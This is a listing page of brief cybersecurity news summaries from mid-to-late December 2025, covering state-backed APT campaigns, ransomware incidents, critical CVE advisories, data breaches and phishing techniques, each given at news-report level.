The Iranian state-sponsored threat group "Prince of Persia" has resurfaced with multiple active malware campaigns, according to a new report from SafeBreach. The APT group is deploying new variants of its signature "Tonnerre" and "Foudre" backdoors. In a significant tactical evolution, one new variant, Tonnerre v50, now uses Telegram for command and control (C2) communications, replacing older protocols. The campaigns, which feature multiple Domain Generation Algorithms (DGAs), appear to be targeting critical infrastructure, indicating a patient and re-tooled adversary.

Dec 28, 20256 min read

"Aisuru" Botnet Shatters Records with 29.7 Tbps DDoS Attack

A powerful botnet-for-hire service named "Aisuru" has emerged as a major global threat, responsible for a new record-breaking Distributed Denial-of-Service (DDoS) attack peaking at 29.7 Terabits per second (Tbps). The botnet, which leverages millions of compromised Internet of Things (IoT) devices and routers, has been linked to over 1,300 attacks in just three months. The industrial scale of the Aisuru service poses a severe risk to internet stability, with attacks impacting the gaming, telecommunications, and financial services sectors.

Dec 28, 20255 min read

Baker University Discloses Year-Old Breach Affecting Over 53,000 Individuals

Baker University in Kansas has begun notifying 53,624 individuals about a severe data breach that occurred in December 2024. Attackers maintained access to the university's network for over two weeks, from December 2 to December 19, 2024. The compromised data is highly sensitive, including names, Social Security numbers, student IDs, financial account information, and private health data. The university detected the breach following a network outage but is only now, a full year later, informing the victims.

Dec 27, 20255 min read

Critical RCE Flaw in n8n Puts 103,000+ Workflow Automation Servers at Risk

A critical remote code execution (RCE) vulnerability, CVE-2025-68613, with a CVSS score of 9.9, has been disclosed in the n8n workflow automation platform. The flaw affects over 103,000 publicly exposed instances. It allows an authenticated attacker with low-level privileges (the ability to create or edit workflows) to execute arbitrary commands on the underlying server by exploiting an expression injection weakness. This can lead to a full server compromise, data exfiltration, and lateral movement into connected systems. Users are urged to upgrade to patched versions (1.120.4, 1.121.1, or 1.122.0) immediately.

Dec 27, 20254 min read

LockBit 5.0 Ransomware Claims Attack on Greek Luxury Hotel Group EM Resorts

On December 26, 2025, the prolific LockBit 5.0 ransomware group claimed responsibility for a cyberattack against EM Resorts, a luxury hotel operator based in Crete, Greece. The group posted a notice on its dark web leak site, threatening to publish exfiltrated data unless a company representative makes contact. This incident follows LockBit's typical double-extortion model, where they both encrypt victim data and steal it for leverage. The full scope of the breach and the type of data stolen have not yet been disclosed, but the attack highlights the ongoing threat ransomware poses to the hospitality industry.

Dec 27, 20254 min read

Typo in Windows Activation Script Leads to Cosmali Loader Malware Infection

A typosquatting campaign discovered on December 26, 2025, is targeting users of the popular Microsoft Activation Scripts (MAS) tool. Attackers registered the domain `get.activate[.]win`, a common misspelling of the legitimate domain. Users who mistype the command are redirected to the malicious site, which infects their systems with the Cosmali Loader malware. This loader, in turn, deploys additional payloads, including cryptominers and the XWorm Remote Access Trojan (RAT), giving attackers full control over the victim's machine. In a strange twist, some victims received a pop-up warning them of the infection, believed to be from a third party who hacked the malware's C2 panel.

Dec 27, 20254 min read

Debian Patches High-Severity SQL Injection Flaw in PgBouncer

On December 27, 2025, the Debian project released a security update for a high-severity SQL injection vulnerability, CVE-2025-12819, in PgBouncer, a widely used connection pooler for PostgreSQL. The flaw, which has a CVSS score of 8.1, allows an unauthenticated remote attacker to execute arbitrary SQL commands. The vulnerability can be triggered by injecting a malicious 'search_path' parameter during the authentication process. The issue has been fixed in PgBouncer version 1.25.1 and backported to Debian 11 'bullseye' in version 1.15.0-1+deb11u2. Administrators are urged to upgrade their packages to mitigate the risk.

Dec 27, 20254 min read

Evasive Panda APT Hijacks DNS to Deploy MgBot Backdoor in Multi-Country Espionage Campaign

A sophisticated, long-running cyber-espionage campaign by the China-linked threat actor 'Evasive Panda' (also known as Bronze Highland) has been detailed. Active between November 2022 and November 2024, the group targeted entities in Türkiye, China, and India. Instead of traditional phishing, the attackers used adversary-in-the-middle (AitM) attacks, specifically DNS poisoning, to hijack legitimate software update channels. This allowed them to deliver the modular MgBot backdoor, a potent espionage tool capable of file harvesting, keylogging, and credential theft, by injecting it into the legitimate 'svchost.exe' process.

Dec 26, 20255 min read

Romanian Energy Giant Hit by 'Gentlemen' Ransomware in Holiday Attack

Romania's largest coal-based energy producer, Oltenia Energy Complex, was struck by the 'Gentlemen' ransomware group in a targeted attack on December 26, 2025. The incident disrupted key business applications, including ERP systems and corporate email, by encrypting files. While power generation and the national energy grid were not affected, the attack highlights the increasing trend of targeting critical infrastructure during holiday periods when staffing is reduced. The company has isolated affected systems and initiated an investigation with Romania's organized crime unit.

Dec 26, 20254 min read

Critical Flaws Under Fire: 'React2Shell' (CVSS 10.0) and Windows Zero-Day Actively Exploited

A December 26 security report highlights a convergence of critical vulnerabilities being actively exploited in the wild. Among them is 'React2Shell' (CVE-2025-55182), a CVSS 10.0 remote code execution flaw in React Server Components used to deploy cryptominers. Additionally, a Windows zero-day (CVE-2025-62221) allowing local privilege escalation to SYSTEM is being used in targeted attacks. The report also warns of two high-severity authentication bypass vulnerabilities (CVE-2025-59718 and CVE-2025-59719) in FortiGate firewalls, creating a multi-front threat for organizations.

Dec 26, 20254 min read

Christmas Day Barrage: Mass Exploit Campaign Hits Adobe ColdFusion Servers

A massive, coordinated exploitation campaign targeted Adobe ColdFusion servers, peaking on Christmas Day 2025. Security firm GreyNoise reported that a single threat actor, operating almost exclusively from Japan-based infrastructure, launched nearly 6,000 exploit attempts against more than ten different ColdFusion CVEs. The primary attack vector was JNDI/LDAP injection. This activity is believed to be part of a much larger initial access broker operation, where the same actor has been observed scanning for hundreds of different vulnerabilities across numerous technology stacks to compromise systems and sell access to other cybercriminals.

Dec 26, 20255 min read

Critical Flaw in WHILL Wheelchairs Allows Remote Hijacking via Bluetooth

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory for a critical vulnerability, CVE-2025-14346, in WHILL electric wheelchairs. The flaw, rated 9.8 on the CVSS scale, stems from a missing authentication mechanism over Bluetooth. It allows an attacker within Bluetooth range (approx. 30 feet) to pair with a device and gain complete control, including issuing movement commands and overriding speed limits. This poses a direct physical safety risk to users. The manufacturer, WHILL Inc., has deployed firmware and application mitigations.

Dec 26, 20254 min read

HoneyMyte APT (Mustang Panda) Deploys New Kernel-Mode Rootkit to Hide Backdoor

The Chinese cyber-espionage group HoneyMyte (also known as Mustang Panda) has significantly upgraded its toolkit by incorporating a kernel-mode rootkit, according to research from December 26, 2025. The rootkit is used to protect and conceal a new variant of its exclusive ToneShell backdoor. The malicious driver, often signed with a stolen certificate, registers itself as a mini-filter to hide the malware's files, processes, and registry keys from security tools. This advanced technique, observed in attacks against government targets in Myanmar and Thailand, dramatically increases the malware's stealth and persistence.

Dec 26, 20255 min read

CISA Warns of Code Execution Flaw in WatchGuard Fireware OS

On December 26, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an alert for a vulnerability in WatchGuard's Fireware OS. The flaw could potentially allow an attacker to execute arbitrary code on an affected network security appliance. Specific details such as the CVE identifier and affected versions were not included in the initial alert. CISA urges administrators of WatchGuard devices to review vendor advisories for technical details and apply recommended mitigations to protect their network perimeters.

Dec 26, 20253 min read

SEC Busts $14M AI-Powered Crypto Scam That Used Deepfakes

The U.S. Securities and Exchange Commission (SEC) has charged seven entities for their involvement in a sophisticated cryptocurrency investment scam that defrauded retail investors of over $14 million. The scheme, which ran for a year, used social media ads featuring deepfake videos of financial professionals to lure victims into private messaging groups. Inside these groups, fraudsters posing as experts used AI-generated investment tips to build trust before directing victims to fraudulent trading platforms. When investors tried to withdraw funds, they were hit with advance fee demands, compounding their losses.

Dec 25, 20254 min read

2025 in Review: Mega-Deals Like Google/Wiz and Palo Alto/CyberArk Reshape Cybersecurity

The cybersecurity industry witnessed a massive wave of consolidation in 2025, with total M&A deal value approaching the record $75 billion set in 2021. A year-end analysis highlights several multi-billion dollar mega-deals, including Google's $32 billion acquisition of Wiz, Palo Alto Networks' $25 billion purchase of CyberArk, and ServiceNow's $7.75 billion deal for Armis. This surge reflects a fundamental market shift away from point solutions and towards integrated, simplified, and automated security platforms capable of managing complex risks across cloud, AI, and identity.

Dec 25, 20254 min read

NIST and MITRE Launch $20M AI Centers to Secure Critical Infrastructure

The U.S. National Institute of Standards and Technology (NIST) and the non-profit MITRE Corporation have announced a $20 million investment to establish two new national artificial intelligence (AI) research centers. The initiative aims to accelerate the adoption of AI to boost U.S. manufacturing competitiveness and to develop advanced methods for securing the nation's critical infrastructure from AI-driven cyberthreats. The centers will leverage MITRE's extensive experience in operating federal R&D centers and its public contributions like the ATT&CK framework.

Dec 25, 20253 min read

Malicious Scripts Targeting ICS Surge in East Asia, Kaspersky Reports

A Q3 2025 threat report from Kaspersky's ICS CERT reveals a significant increase in cyber threats targeting Industrial Control Systems (ICS) in East Asia. The region jumped to third place globally for the percentage of ICS computers where malicious objects were blocked. The most alarming trend was a surge in malicious scripts and phishing pages, which became the top threat category, with attack rates 1.4 times higher than the global average. This spike is primarily attributed to attacks targeting the engineering and ICS integrator sector in Mainland China, where malware was found hidden in customized P2P client applications.

Dec 25, 20255 min read

Fake Job Ad Scams Surge Across MENA Region, Experts Warn

Security researchers are warning of a rising tide of coordinated scam campaigns targeting job seekers across the Middle East and North Africa (MENA) region. These campaigns utilize fake online job advertisements posted on social media and job portals to deceive individuals. The goal is to trick victims into divulging sensitive personal information or making fraudulent payments for non-existent application fees or training materials. This trend aligns with a global increase in sophisticated digital fraud, where criminals exploit economic conditions and the need for employment.

Dec 25, 20253 min read

AI Adoption Fuels 'Massive' Cloud Attack Surface Expansion, Palo Alto Networks Report Warns

Palo Alto Networks' 2025 'State of Cloud Security Report' reveals that the rapid adoption of AI is creating an unprecedented expansion of the cloud attack surface. The study, surveying 2,800 security leaders, found that 99% of organizations have had their AI systems attacked in the last year. The use of generative AI in coding is producing insecure code faster than security teams can remediate it, creating a significant risk gap. API attacks have surged by 41% year-over-year, and lenient identity and access management (IAM) remains a top vulnerability. The report calls for a unified, platform-based approach to cloud security to counter AI-weaponized threats.

Dec 24, 20255 min read

CISA Adds Actively Exploited Fortinet SSO Flaw to KEV Catalog, Urges Immediate Patching

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical Fortinet vulnerability, CVE-2025-59718, to its Known Exploited Vulnerabilities (KEV) catalog, indicating active attacks in the wild. The flaw, rated 9.1 CVSS, allows an unauthenticated attacker to bypass FortiCloud single sign-on (SSO) authentication on multiple products, including FortiOS and FortiProxy, by sending a crafted SAML message. Security firm Arctic Wolf observed attackers exploiting the flaw within days of its disclosure to export device configurations and harvest credentials. CISA has mandated that federal agencies patch by December 23, 2025, and strongly advises all organizations to apply updates or disable the feature immediately.

Dec 24, 20255 min read

Anna's Archive Scrapes 300TB of Spotify Music Data in "Preservation" Effort

The hacktivist and digital preservation group Anna's Archive has announced it scraped and archived nearly 300 TB of data from the music streaming giant Spotify. The trove includes metadata for 256 million tracks and audio for 86 million songs, which the group plans to release via torrents. Spotify clarified this was not a system breach but a large-scale violation of its terms of service by third-party accounts created to systematically exfiltrate content. The company confirmed that no private user data like passwords or payment details were compromised and that the abusive accounts have been disabled.

Dec 23, 20256 min read

DoJ Dismantles $28M Bank Fraud Ring, Seizes Phishing Database

The U.S. Department of Justice has seized the domain `web3adspanels.org` and its associated backend database, which were central to a massive bank account takeover fraud operation. The criminal scheme used phishing websites to impersonate financial institutions and harvest victim credentials, leading to attempted losses of approximately $28 million and actual losses of $14.6 million. The action follows an FBI warning about this type of fraud and was coordinated with law enforcement in Estonia and Georgia.

Dec 23, 20254 min read

New MacSync Malware Dropper Bypasses macOS Gatekeeper with Apple Notarization

A new campaign is distributing the MacSync information-stealing malware using a dropper that successfully bypasses Apple's macOS Gatekeeper security feature. The malicious installer is packaged as a disk image for a fake messaging app, and crucially, has been both digitally signed and notarized by Apple. This abuse of Apple's own security vetting process allows the malware to appear as a trusted application, tricking users into running it and compromising their systems to exfiltrate sensitive information.

Dec 23, 20254 min read

Kazakhstan Issues New National Cybersecurity Guidelines Amid Rising Public Awareness

On December 23, 2025, Kazakhstan's Ministry of Digital Development, Innovation and Aerospace Industry (MAIDD) published updated national recommendations for cybersecurity and personal data protection. This initiative aims to strengthen the country's digital defenses and comes as a recent study reveals that public awareness of cyber threats has surged to 86% in 2025, up from 62.9% in 2018. The new guidelines emphasize key practices like encryption and the use of antivirus software.

Dec 23, 20253 min read

Major Blow to African Cybercrime: 574 Arrested, $3M Seized in International Takedown

A large-scale, coordinated international law enforcement operation has dismantled several major cybercrime networks operating across West and Central Africa. The crackdown resulted in the arrest of 574 individuals and the seizure of approximately $3 million. The operation targeted criminal syndicates involved in a range of illicit activities, including Business Email Compromise (BEC) scams, ransomware attacks, and other forms of online fraud. Arrests were made in Senegal, Ghana, Benin, and Cameroon.

Dec 23, 20254 min read

Romanian Water Authority Crippled by Ransomware, 1,000 Systems Encrypted with BitLocker

On December 20, 2025, Romania's national water authority, Administrația Națională Apele Române, was targeted in a significant ransomware attack. The incident compromised approximately 1,000 IT systems across its headquarters and 10 of 11 regional offices. Attackers employed a "living off the land" technique, weaponizing the native Windows BitLocker tool to encrypt systems instead of deploying custom ransomware. While IT services such as email, web servers, and GIS applications were disrupted, the agency confirmed that its Operational Technology (OT) networks controlling physical water infrastructure were not impacted, preventing a disruption to public water services. The Romanian National Cyber Security Directorate (DNSC) is investigating the incident and has reiterated its policy of not negotiating with attackers.

Dec 22, 20256 min read

Nissan Breach Exposes 21,000 Customers After Third-Party Red Hat Server Compromise

Nissan Motor Co. announced on December 22, 2025, a data breach affecting approximately 21,000 customers. The incident was a result of a supply chain attack, originating from the compromise of a Red Hat-managed GitLab server. This server was used by a third-party contractor developing a customer management system for a Nissan dealership. Red Hat detected the initial unauthorized access on September 26, 2025, and notified Nissan on October 3. The exposed data includes customer names, addresses, phone numbers, and partial email addresses. The extortion group ShinyHunters and a group called 'Crimson Collective' have been linked to the initial attack on Red Hat's infrastructure.

Dec 22, 20255 min read

Anubis Ransomware Hits AllerVie Health, Exposing Patient SSNs and Driver's Licenses

AllerVie Health, a Texas-based healthcare provider, began notifying patients on December 22, 2025, of a ransomware attack that exposed highly sensitive personal information. The company detected the intrusion on November 2, 2025, with forensic analysis revealing unauthorized access occurred between October 24 and November 3. The exposed data includes patient names, Social Security numbers, and driver's license numbers. The attack has been linked to the Anubis ransomware group, which allegedly claimed to have stolen data from over 30,000 patients on its dark web leak site. AllerVie is offering complimentary credit monitoring services to affected individuals.

Dec 22, 20256 min read

New WhatsApp Hijack Method Bypasses 2FA via SIM Swapping Attacks

On December 21, 2025, security researchers highlighted a growing attack method used to hijack WhatsApp accounts that bypasses traditional authentication measures. The technique relies on SIM swapping, where attackers use social engineering to convince a victim's mobile carrier to transfer their phone number to a SIM card controlled by the attacker. Once they control the number, they can install WhatsApp and receive the SMS verification code to take over the account, locking the legitimate user out. This method circumvents the need to crack passwords or bypass on-device security. The North Korea-linked threat group APT37 has reportedly been observed using this technique.

Dec 22, 20255 min read

Data Breaches Trigger Securities Lawsuits Against Tech Companies

A report on December 21, 2025, revealed a growing legal trend where companies face securities class-action lawsuits following data breaches. Two unnamed technology companies are now facing such litigation from investors. The lawsuits allege that the companies made misleading statements or failed to disclose known cybersecurity weaknesses in their public filings, which artificially inflated their stock prices. When the data breaches were eventually announced, the subsequent drop in stock value caused financial harm to investors, who are now suing to recover their losses. This highlights the increasing pressure from regulators and shareholders for transparent and accurate cybersecurity risk disclosures.

Dec 22, 20254 min read

CEO of Chinese Cybersecurity Firm Cnzxsoft Hit with Spending Ban Amid Debt Crisis

On December 22, 2025, veteran Chinese cybersecurity firm Cnzxsoft (Zhongxin Network Information Security Co., Ltd.) was placed on a Beijing court's list of "dishonest judgment debtors" due to a severe liquidity crisis. As a result, the company's founder and CEO, Zhou Xiandong, was issued a Restricted Consumption Order, which bars him from high-cost personal spending such as luxury travel. Cnzxsoft, a firm with major state-owned clients like CCTV and China Mobile, is facing profound financial distress, highlighting systemic cash flow problems within China's IT sector, where long payment cycles from government contracts are common.

Dec 22, 20253 min read

Australian Fertility Clinic Genea Hit by 'Termite' Ransomware Gang

The 'Termite' ransomware gang has claimed responsibility for an attack on Australian fertility provider Genea. The group, which uses a variant of the leaked Babuk ransomware code, alleges it exfiltrated 700GB of highly sensitive patient data, including medical histories and diagnostic results. This double-extortion attack places victims at severe risk of fraud and personal extortion, highlighting the growing threat to the healthcare sector.

Dec 21, 20255 min read

Australian Health Audit Finds Clinicians Routinely Bypass Security Controls

An audit of the New South Wales (NSW) healthcare system in Australia has revealed that clinicians are routinely bypassing critical cybersecurity controls, such as password sharing and using personal devices, to save time in high-pressure environments. This widespread "normalisation of non-compliance" creates significant security gaps and increases the risk of cyberattacks in the already heavily targeted healthcare sector, highlighting a critical failure in security culture.

Dec 21, 20255 min read

React2Shell Apocalypse: CVSS 10.0 Flaw Exploited by China, North Korea, and Botnets

A critical, unauthenticated remote code execution vulnerability (CVSS 10.0) in React Server Components, dubbed 'React2Shell' and tracked as CVE-2025-55182, is under widespread attack. The flaw allows attackers to take full control of vulnerable servers with a single crafted HTTP request. Within hours of disclosure, Chinese and North Korean state-sponsored groups, alongside criminal botnets, began mass exploitation campaigns. These attacks deploy a range of malware, including the new EtherRAT backdoor, Cobalt Strike, and infostealers. With over 165,000 vulnerable instances identified and half remaining unpatched, CISA has issued an emergency directive for federal agencies to mitigate the threat immediately, highlighting the extreme urgency for all affected organizations to apply patches.

Dec 20, 20257 min read

University of Sydney Data Breach Exposes Info of 27,500 Staff and Students

The University of Sydney has announced a significant data breach affecting approximately 27,500 individuals after an unauthorized party gained access to an internal IT code library. The compromised repository contained historical data files with personal information of current and former staff, affiliates, students, and alumni, primarily from 2010-2019. Exposed data includes names, dates of birth, phone numbers, and home addresses. The university has secured the environment and is in the process of notifying all affected individuals while an investigation is ongoing.

Dec 20, 20255 min read

Nefilim Ransomware Operator Pleads Guilty in U.S. Court

Artem Aleksandrovych Stryzhak, a Ukrainian national, has pleaded guilty in a U.S. federal court for his role in the Nefilim ransomware conspiracy. Stryzhak, 35, was a key operator for the ransomware group that targeted high-revenue companies in the U.S. and Europe between 2018 and 2021, causing millions in damages. The group was known for its double-extortion tactics, stealing data before encryption and threatening to leak it on their 'Corporate Leaks' site. Stryzhak faces up to 10 years in prison, while his co-conspirator, Volodymyr Tymoshchuk, remains at large with an $11 million bounty offered by the U.S. Department of State.

Dec 20, 20255 min read

URGENT: Cisco Warns of Active Zero-Day Attacks on Email Security Appliances

Cisco has issued an urgent security advisory for an actively exploited zero-day vulnerability in its AsyncOS software, affecting Cisco Secure Email Gateway (formerly IronPort) and Secure Email and Web Manager appliances. Threat actors are leveraging the unpatched flaw to deploy persistent backdoors and tunneling tools, granting them long-term, stealthy access to enterprise email infrastructure. A patch is not yet available, and Cisco is strongly urging administrators to apply interim mitigations, restrict management access, and monitor logs for signs of compromise.

Dec 20, 20255 min read

Warning: "GhostPairing" Attack Hijacks WhatsApp Accounts with Malicious QR Codes

A new social engineering campaign dubbed "GhostPairing" is exploiting WhatsApp's multi-device linking feature to hijack user accounts. India's CERT-In has issued a high-severity warning about the attack, which tricks victims into scanning a malicious QR code or entering a pairing code from a fraudulent website. This action links the attacker's device to the victim's account, granting them full access to messages, contacts, and media without needing a password or SIM swap. The attack bypasses traditional authentication, relying purely on deceiving the user into performing the linking action themselves.

Dec 20, 20255 min read

MongoDB 'MongoBleed' Flaw Allows Unauthenticated Data Leaks, Actively Exploited

MongoDB has disclosed a high-severity vulnerability, CVE-2025-14847, nicknamed "MongoBleed." The flaw is an unauthenticated memory leak in the database server's zlib compression functionality. A remote, unauthenticated attacker can send a malformed message to a vulnerable server, causing it to leak contents of its memory. This exposed data can include sensitive information like plaintext passwords, API keys, and session tokens from other user sessions. The vulnerability affects multiple versions of MongoDB, and with a PoC exploit public and active exploitation confirmed, administrators are urged to upgrade immediately or disable zlib compression as a workaround.

Dec 20, 20255 min read

.NET "SOAPwn" Flaw Allows Authentication Bypass and RCE in Enterprise Apps

A critical vulnerability nicknamed "SOAPwn" has been discovered in .NET applications utilizing SOAP-based web services. The flaw, reported on December 19, 2025, allows an unauthenticated attacker to send a specially crafted SOAP request to bypass security checks and achieve remote code execution. This poses a severe risk to many enterprise applications that rely on the legacy SOAP protocol for critical business functions. Microsoft has issued guidance and released patches, urging organizations to update their applications immediately and monitor for suspicious SOAP traffic.

Dec 20, 20255 min read

China-Linked Hackers Exploit Critical Cisco Email Gateway Zero-Day

Cisco has revealed that a China-affiliated advanced persistent threat (APT) group, tracked as UAT-9686, is actively exploiting a critical zero-day vulnerability in its email security products. The flaw, CVE-2025-20393, is a remote code execution vulnerability with a maximum CVSS score of 10.0, affecting Cisco Secure Email Gateway and Secure Email and Web Manager appliances. The attackers have been exploiting the flaw since late November 2025 to gain root-level access and have deployed persistence mechanisms on compromised devices. Due to active exploitation by a nation-state actor, CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating immediate patching for federal agencies.

Dec 19, 20256 min read

HPE Issues Urgent Patch for 10.0 CVSS RCE Flaw in OneView

Hewlett Packard Enterprise (HPE) has released an urgent security advisory for CVE-2025-37164, a critical vulnerability in its OneView infrastructure management software with a maximum CVSS score of 10.0. The flaw allows a remote, unauthenticated attacker to achieve complete remote code execution on affected systems. HPE OneView versions 5.20 through 10.20 are impacted. Given that OneView serves as a central control plane for enterprise server, storage, and firmware management, a compromise could give an attacker control over vast segments of IT infrastructure. HPE is urging customers to upgrade to the patched version 11.0 or apply an emergency hotfix immediately.

Dec 19, 20255 min read

Actively Exploited RCE Flaw in WatchGuard Firewalls Puts Networks at Risk

WatchGuard has issued an urgent advisory for customers to patch CVE-2025-14733, a critical remote code execution vulnerability in its Fireware OS that is confirmed to be under active exploitation. The flaw, an out-of-bounds write issue in the IKEv2 process, has a CVSS score of 9.3 and can be exploited by an unauthenticated remote attacker. The vulnerability affects Firebox firewalls with specific IKEv2 VPN configurations enabled. Given that firewalls are prime targets for initial access, immediate application of the provided security updates is crucial to protect network perimeters from compromise.

Dec 19, 20255 min read

Manufacturing Web Portals Are a Weak Link in Supply Chain Attacks

A new report reveals that cybercriminals are increasingly targeting manufacturers through their public-facing web portals, such as supplier and customer forms, to execute supply chain attacks. Attackers are using bots and SQL injection to compromise these forms, which often run on legacy systems with weak security. The goal is to steal sensitive data, including credentials and intellectual property, or to gain a foothold to attack more heavily regulated downstream customers in defense, healthcare, and finance. A survey found that 85% of manufacturing firms experienced a security incident related to web forms, and 42% confirmed a resulting data breach.

Dec 19, 20255 min read

"GhostPoster" Malware Infects 50,000+ Firefox Users via Malicious Add-ons

A stealthy malware campaign named "GhostPoster" has infected over 50,000 Mozilla Firefox users by distributing 17 malicious browser extensions. The add-ons, which masqueraded as legitimate tools like VPNs and ad blockers, have been removed from the Firefox store. The malware employed a clever technique, hiding obfuscated JavaScript within the add-on's logo image file. This code would then contact command-and-control (C2) servers to download a final payload designed for hijacking affiliate links and committing ad fraud. The campaign used evasion techniques like randomized and delayed C2 callbacks to avoid detection.

Dec 18, 20254 min read

"Scripted Sparrow" BEC Group Targets Finance Teams with Highly Structured Attacks

A disciplined and persistent Business Email Compromise (BEC) group, newly identified by Fortra as "Scripted Sparrow," has been systematically targeting corporate finance teams since at least June 2024. The group employs a structured and well-researched approach, sending highly credible phishing emails with fake invoices that impersonate professional services firms. To add legitimacy, the attackers often include forged prior email correspondence from a company executive authorizing the payment. The group utilizes a large network of US-based mule accounts for cashing out, indicating a well-organized and persistent financial threat.

Dec 18, 20254 min read

"IRLeaks" Supply Chain Attack Hits Iranian Banks, Exposing Millions of Customer Records

A major supply chain attack dubbed "IRLeaks" has resulted in a significant data breach affecting several prominent Iranian banks and millions of their customers. Attackers first compromised a third-party IT vendor in October 2025, using it as a pivot point to infiltrate the banks' networks. Over the following month, they exfiltrated vast amounts of financial data and personally identifiable information (PII), including national IDs and bank account numbers, before the breach was discovered in late November. The incident highlights the critical risks associated with third-party vendor security and inadequate patch management.

Dec 18, 20254 min read

Ransomware Evolves: "ClickFix" Social Engineering and Threat Actor Alliances on the Rise

A December 2025 threat report from NCC Group indicates that while ransomware attack volumes plateaued in November with 583 incidents, their sophistication markedly increased. Attackers are increasingly adopting the "ClickFix" (also known as ClearFake) social engineering technique, which tricks users into manually running malicious commands, bypassing many automated defenses. The report also highlights a trend of collaboration, with groups like DragonForce forming alliances with skilled affiliates from other networks. The Qilin ransomware group remained the most prolific actor, with the industrials sector and North America being the most targeted.

Dec 18, 20254 min read

"Operation ForumTroll" APT Targets Russian Academics with Plagiarism Lure

The Advanced Persistent Threat (APT) group known as Operation ForumTroll has launched a new, highly targeted phishing campaign aimed at Russian political scientists and academics. Active since at least 2022, the group's latest attack uses meticulously crafted emails impersonating a major Russian scientific library, eLibrary.ru. The emails lure victims into downloading a supposed plagiarism report, which is a ZIP archive containing a malicious .LNK file. Executing the shortcut file triggers a PowerShell script that downloads and installs the Tuoni command-and-control (C2) framework, giving the attackers remote access for espionage purposes.

Dec 18, 20254 min read

Google Investigates Malicious Code Found in Search Result Infrastructure

Google has launched an urgent investigation after cybersecurity analysts discovered anomalous, encrypted code snippets and obfuscated JavaScript embedded within its core search result payloads on December 17, 2025. The malicious code appears designed to exploit browser sandboxing vulnerabilities, which could potentially enable remote code execution or data theft on users' systems. While Google has not confirmed any user impact and states it is neutralizing the threat, the incident represents a highly sophisticated attack against critical global internet infrastructure, prompting the involvement of government agencies.

Dec 18, 20254 min read

SANS Report: OT/ICS Cyber Incidents Rising, 40% Cause Downtime

A new report from the SANS Institute highlights a dangerous trend in the security of Operational Technology (OT) and Industrial Control Systems (ICS). The '2025 State of ICS/OT Security Report' found that over 21% of organizations experienced a cyber incident in their OT environment in the past year. Of those, 40.3% suffered operational downtime. Ransomware was a primary cause, responsible for 37.9% of incidents, with unauthorized external connections being the top initial access vector. The report also points to a significant 'resilience gap,' with recovery times often exceeding one month.

Dec 17, 20255 min read

SoundCloud and Pornhub Confirm User Data Exposure in Separate Breaches, One Via Third-Party

Both SoundCloud and Pornhub have confirmed security incidents exposing user data. SoundCloud suffered a direct breach of an ancillary service dashboard, resulting in the exfiltration of email addresses and public profile information for up to 28 million users (20% of its user base). The company states passwords and financial data were not affected. Separately, Pornhub announced that historical analytics data of some Premium members was exposed due to a breach at its former third-party analytics vendor, Mixpanel. The notorious hacking group ShinyHunters has claimed the Mixpanel breach and is attempting to extort Pornhub, alleging they stole a massive database of user search and watch history.

Dec 17, 20255 min read

French Interior Ministry Confirms Cyberattack Compromised Email Servers

The French Ministry of the Interior has confirmed its email servers were compromised in a cyberattack detected between December 11 and 12, 2025. Interior Minister Laurent Nuñez stated that attackers stole staff email passwords, allowing them to access an unknown number of document files. While the government is still assessing the scale, a hacker group named 'Indra' has claimed, without evidence, to have exfiltrated police files on 16.4 million citizens. In response, the ministry is rolling out two-factor authentication and resetting passwords. The attack on the high-value government target, which oversees national police and security, has raised speculation of nation-state involvement, with groups like APT28 being considered.

Dec 17, 20255 min read

New 'ConsentFix' Phishing Attack Hijacks Microsoft Accounts, Bypassing MFA via Azure CLI Abuse

A novel and sophisticated phishing attack dubbed 'ConsentFix' allows attackers to hijack Microsoft accounts without stealing passwords or bypassing multi-factor authentication (MFA). Discovered by Push Security, the browser-native attack tricks users into completing a fake verification process that involves copying a URL containing a sensitive OAuth authorization code from their browser's address bar and pasting it into the attacker's phishing page. The attacker then uses this code to authenticate as the user via the legitimate and trusted Microsoft Azure Command-Line Interface (CLI). Because the Azure CLI is a first-party app, it bypasses many consent restrictions, granting the attacker full account access. The technique is active and circumvents even phishing-resistant authentication like passkeys.

Dec 17, 20255 min read

New Zealand Launches Massive Public Alert, Warning 26,000 Citizens of Lumma Stealer Malware Infections

In a first-of-its-kind campaign, New Zealand's National Cyber Security Centre (NCSC) is emailing approximately 26,000 people to warn them of potential infection by the Lumma Stealer malware. The potent information-stealing software targets Windows devices to covertly harvest sensitive data, including passwords, browser credentials, banking details, and cryptocurrency wallets. Officials have confirmed that some of the stolen credentials were linked to government and banking systems, heightening the risk of fraud. The NCSC's mass notification directs affected individuals to a government website with instructions for malware removal and improving account security.

Dec 17, 20254 min read

MITRE Extends D3FEND Cybersecurity Framework to Operational Technology (OT)

MITRE has officially extended its D3FEND cybersecurity framework to include Operational Technology (OT), providing a standardized knowledge base of defensive techniques for cyber-physical systems. Announced on December 16, 2025, the NSA-funded initiative aims to create a common language for securing critical infrastructure in sectors like energy, manufacturing, and defense. As OT systems become increasingly connected to IT networks, D3FEND for OT provides a structured ontology of countermeasures tailored to the unique components and risks of industrial environments, mapping defensive techniques to threats against controllers, sensors, and actuators.

Dec 17, 20254 min read

'Operation MoneyMount-ISO' Phishing Campaign Deploys Phantom Stealer via Malicious ISOs

A financially motivated, Russian-language phishing campaign dubbed 'Operation MoneyMount-ISO' is actively targeting finance and accounting departments to deploy the Phantom information-stealing malware. According to researchers at Seqrite Labs, the attack uses emails with fake payment confirmations that contain a malicious ISO disk image file. This technique is designed to bypass email security controls. When the user opens the ISO, it mounts a virtual drive with a disguised executable. Running this file triggers a memory-resident infection chain that deploys Phantom Stealer, which then harvests browser credentials, crypto wallets, and other sensitive data for exfiltration.

Dec 17, 20255 min read

Storm-0249 Evolves: Access Broker Now Deploys Ransomware with Advanced Stealth Tactics

The initial access broker (IAB) known as Storm-0249 is evolving its tactics, moving beyond simply selling network access to actively participating in malware deployment. According to ReliaQuest, the group now uses more sophisticated techniques, including DLL side-loading and fileless PowerShell execution, to facilitate ransomware attacks directly. Their methods involve social engineering victims into running malicious commands (`ClickFix`), which fetch and execute PowerShell scripts from spoofed domains. A key technique is dropping a trojanized version of a SentinelOne security agent DLL to run malware under the guise of a trusted process. This evolution signifies a dangerous trend where IABs are becoming more integrated into the ransomware deployment process, increasing their threat level.

Dec 16, 20256 min read

